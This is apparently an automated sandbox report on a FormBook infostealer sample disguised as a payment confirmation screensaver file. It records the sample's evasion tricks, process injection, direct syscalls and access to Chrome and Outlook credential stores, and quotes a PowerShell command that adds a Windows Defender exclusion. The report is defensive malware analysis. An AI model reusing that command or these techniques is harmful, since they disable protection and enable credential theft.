Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 2400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 7FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 8FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 91A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: A1A0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00A80101 rdtsc

3_2_00A80101

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2586	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Window / User API: threadDelayed 9798	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\finger.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\finger.exe

API coverage: 2.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr TID: 3380	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep count: 162 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep time: -324000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep count: 9798 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep time: -19596000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700	Thread sleep time: -41000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\finger.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\finger.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\finger.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Code function: 6_2_61E19A2D sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,

6_2_61E19A2D

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00A80101 rdtsc

3_2_00A80101

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00A307AC NtCreateMutant,LdrInitializeThunk,

3_2_00A307AC

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A20080 mov ecx, dword ptr fs:[00000030h]	3_2_00A20080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A200EA mov eax, dword ptr fs:[00000030h]	3_2_00A200EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A426F8 mov eax, dword ptr fs:[00000030h]	3_2_00A426F8

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryInformationProcess: Direct from: 0x774CFAFA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtCreateUserProcess: Direct from: 0x774D093E	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtCreateKey: Direct from: 0x774CFB62	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQuerySystemInformation: Direct from: 0x774D20DE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtQueryDirectoryFile: Direct from: 0x774CFDBA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtWriteVirtualMemory: Direct from: 0x774D213E	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtCreateFile: Direct from: 0x774D00D6	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetTimer: Direct from: 0x774D021A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenFile: Direct from: 0x774CFD86	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetInformationThread: Direct from: 0x774E9893	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenKeyEx: Direct from: 0x774CFA4A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtAllocateVirtualMemory: Direct from: 0x774CFAE2	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtResumeThread: Direct from: 0x774D008D	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenKeyEx: Direct from: 0x774D103A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtUnmapViewOfSection: Direct from: 0x774CFCA2	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtDelayExecution: Direct from: 0x774CFDA1	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetInformationProcess: Direct from: 0x774CFB4A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetInformationThread: Direct from: 0x774CF9CE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtReadFile: Direct from: 0x774CF915	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtMapViewOfSection: Direct from: 0x774CFC72	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtCreateThreadEx: Direct from: 0x774D08C6	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtDeviceIoControlFile: Direct from: 0x774CF931	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtRequestWaitReplyPort: Direct from: 0x753C6BCE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryValueKey: Direct from: 0x774CFACA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtOpenSection: Direct from: 0x774CFDEA	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtProtectVirtualMemory: Direct from: 0x774D005A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtWriteVirtualMemory: Direct from: 0x774CFE36	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtRequestWaitReplyPort: Direct from: 0x756F8D92	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryVolumeInformationFile: Direct from: 0x774CFFAE	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtNotifyChangeKey: Direct from: 0x774D0F92	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQueryAttributesFile: Direct from: 0x774CFE7E	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtReadVirtualMemory: Direct from: 0x774CFEB2	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtSetTimer: Direct from: 0x774E98D5	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	NtSetInformationFile: Direct from: 0x774CFC5A	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	NtQuerySystemInformation: Direct from: 0x774CFDD2	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\finger.exe

Thread APC queued: target process: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Queries volume information: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Code function: 6_2_61E96BE0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

6_2_61E96BE0

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
